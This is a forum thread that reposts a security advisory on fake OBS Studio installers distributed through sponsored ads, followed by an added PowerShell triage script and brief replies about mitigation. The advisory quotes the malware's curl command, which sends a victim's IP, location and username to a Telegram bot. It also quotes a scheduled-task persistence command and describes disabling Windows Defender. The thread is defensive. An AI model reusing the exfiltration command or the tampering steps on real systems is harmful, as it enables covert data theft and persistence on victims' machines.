Lipfert Posted January 17, 2023

From Blackpoint Cyber Security (partner):

Blackpoint Cyber is actively monitoring malicious Open Broadcaster Software (OBS) Studio being delivered through paid sponsored links. The use of sponsored links to distribute malware is another iteration in the continual attempts to compromise devices. The security community is discussing the most recent distribution of fake OBS software as a means of infecting victims, and we wanted to share some details that we have not seen published yet.

The initial stage of the installation will use cURL to obtain country, IP, and city details from ipinfo.io as three separate communications. Once this is acquired, the information is sent to a Telegram chat using a hard-coded API account:

curl.exe -s -k -d chat_id= --data-urlencode "text=[text] IP: X.X.X.X , Country: US, City: , UserName: [this is the device username], Date: Thu mm/dd/yyyy, hh:mm:ss" "https://api.telegram.org/[hardcoded_ID] /sendmessage"

From there, it will systematically use the registry keys to disable core functionality, such as Windows Defender, and uninstall Malwarebytes. To ensure persistence, it will create a scheduled task:

schtasks.exe /create /xml "C:\Users\[username]\AppData\Roaming\obs-studio\bin\64bit\ar.xml"

How to Mitigate:
- Ensure you are accessing websites directly. Advertisements and affiliate links may lead to malicious websites.
- Only download software from legitimate websites and sources. If a paid software is being offered for free or at a discounted price, there is a higher chance it's malicious.

Important: Blackpoint's SOC has seen indicators of compromise in our partners' environments. The Blackpoint SOC will continue to actively monitor for any indicators of compromise associated with this vulnerability. We are confident that our experienced MDR analysts and technology will continue to protect your business and clients.
Sincerely, Blackpoint Cyber
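A host triage script for the behaviours the advisory describes, added here as an example; it is not from Blackpoint Cyber or from any poster in this thread. It looks for a scheduled task or dropper file at the obs-studio path quoted above, the Windows Defender policy keys commonly used to switch protection off (the advisory does not say which keys this sample sets, so those two keys are an assumption), the live Defender state, and cached DNS lookups for the two beacon hosts named in the post. Run it in an elevated PowerShell on the suspect workstation.

```powershell
# Added example (not from the Blackpoint advisory or the forum posts).
# Triage for the indicators described in the advisory above. Run elevated.
# The two Defender registry keys below are the common policy keys used to
# disable protection; the advisory does not name the keys this sample uses,
# so treat that part as an assumption.

$findings = @()

# 1. Scheduled tasks whose XML references the dropper location. Stock OBS
#    installs under Program Files; a copy under a user's roaming AppData is
#    unusual on its own.
$pathPattern = 'AppData\\Roaming\\obs-studio\\bin\\64bit'
foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
    $xml = Export-ScheduledTask -TaskName $task.TaskName -TaskPath $task.TaskPath -ErrorAction SilentlyContinue
    if ($xml -and $xml -match $pathPattern) {
        $findings += [pscustomobject]@{
            Check  = 'ScheduledTask'
            Detail = "$($task.TaskPath)$($task.TaskName)"
        }
    }
}

# 2. The task XML dropped by the installer, checked for every local profile.
foreach ($userDir in Get-ChildItem 'C:\Users' -Directory -ErrorAction SilentlyContinue) {
    $arXml = Join-Path $userDir.FullName 'AppData\Roaming\obs-studio\bin\64bit\ar.xml'
    if (Test-Path $arXml) {
        $findings += [pscustomobject]@{ Check = 'DropperFile'; Detail = $arXml }
    }
}

# 3. Defender policy keys commonly set to 1 to turn protection off (assumed keys).
$defenderKeys = @(
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';                      Name = 'DisableAntiSpyware' },
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection'; Name = 'DisableRealtimeMonitoring' }
)
foreach ($k in $defenderKeys) {
    $value = (Get-ItemProperty -Path $k.Path -Name $k.Name -ErrorAction SilentlyContinue).($k.Name)
    if ($value -eq 1) {
        $findings += [pscustomobject]@{ Check = 'DefenderPolicy'; Detail = "$($k.Path)\$($k.Name) = 1" }
    }
}

# 4. Live Defender state, regardless of how it was switched off.
$mp = Get-MpComputerStatus -ErrorAction SilentlyContinue
if ($mp -and -not $mp.RealTimeProtectionEnabled) {
    $findings += [pscustomobject]@{ Check = 'DefenderState'; Detail = 'Real-time protection is off' }
}

# 5. Recently resolved beacon hosts. Weak indicator on its own: Telegram
#    Desktop and browsers resolve api.telegram.org too, so correlate with
#    the findings above and with proxy/DNS logs for history.
$beaconHosts = 'ipinfo\.io$', 'api\.telegram\.org$'
foreach ($entry in Get-DnsClientCache -ErrorAction SilentlyContinue) {
    foreach ($h in $beaconHosts) {
        if ($entry.Entry -match $h) {
            $findings += [pscustomobject]@{ Check = 'DnsCache'; Detail = "$($entry.Entry) -> $($entry.Data)" }
        }
    }
}

if ($findings.Count -eq 0) {
    Write-Output 'No indicators from the advisory found on this host.'
} else {
    $findings | Sort-Object Check | Format-Table -AutoSize
}
```

The scheduled task and file checks are the strong signals; a hit on either warrants isolating the host and pulling the task XML and the binaries it launches for the SOC. The Defender checks catch the tampering step even if the dropper has since been cleaned up, and the DNS cache check only covers lookups still cached, so use it as corroboration rather than as the deciding indicator.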
Vonrd Posted January 18, 2023

2 hours ago, Lipfert said: The initial stage of the installation will use cURL to obtain country, IP, and city details from ipinfo.io as three separate communications. Once this is acquired, the information is sent to a Telegram chat using a hard-coded API account: curl.exe -s -k -d chat_id= --data-urlencode "text=[text] IP: X.X.X.X , Country: US, City: , UserName: [this is the device username], Date: Thu mm/dd/yyyy, hh:mm:ss" "https://api.telegram.org/[hardcoded_ID] /sendmessage" From there, it will systematically use the registry keys to disable core functionality, such as Windows Defender, and uninstall Malwarebytes. To ensure persistence, it will create a scheduled task: schtasks.exe /create /xml "C:\Users\[username]\AppData\Roaming\obs-studio\bin\64bit\ar.xml"

How can we check to see if this is taking place?
Lipfert Posted January 18, 2023 (Author)

15 hours ago, Vonrd said: How can we check to see if this is taking place?

Don't use: Open Broadcaster Software (OBS) Studio being delivered through paid sponsored links.
Britchot Posted January 18, 2023

Get it directly from OBS Project. Thanks for the heads up. I'm going to put this in Tech Support, as it's related to PCs.